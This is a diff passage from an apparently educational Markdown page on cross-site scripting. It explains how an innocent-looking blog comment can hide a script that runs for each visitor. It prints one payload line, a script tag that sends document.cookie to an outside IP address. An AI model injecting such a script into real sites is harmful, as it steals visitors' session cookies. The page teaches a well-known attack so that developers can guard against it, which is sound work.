se-edu/learningresources/contents/security/crossSiteScripting/crossSiteScripting.md

 I **like** your photograph! <br>
 This is an innocent looking comment.

 Visitors of the blog will only see the non-script portion of the comment.
 The script portion is rendered as `Javascript` just like how the `<b>` and `<i>` tags causes text to be **bolded** and *italicised* but the tags themselves are not shown.

 The script `<script>sendToServer("http://139.241.0.3/", document.cookie)</script>` will be run immediately when the visitors load the website.
-Here, the visitor will be unaware that his cookie is actually stolen.
+Here, the visitor will be unaware that his cookie is stolen.

 Therefore, the malicious user has managed to add additional "functionalities" to the website that is not intended by the original website developer.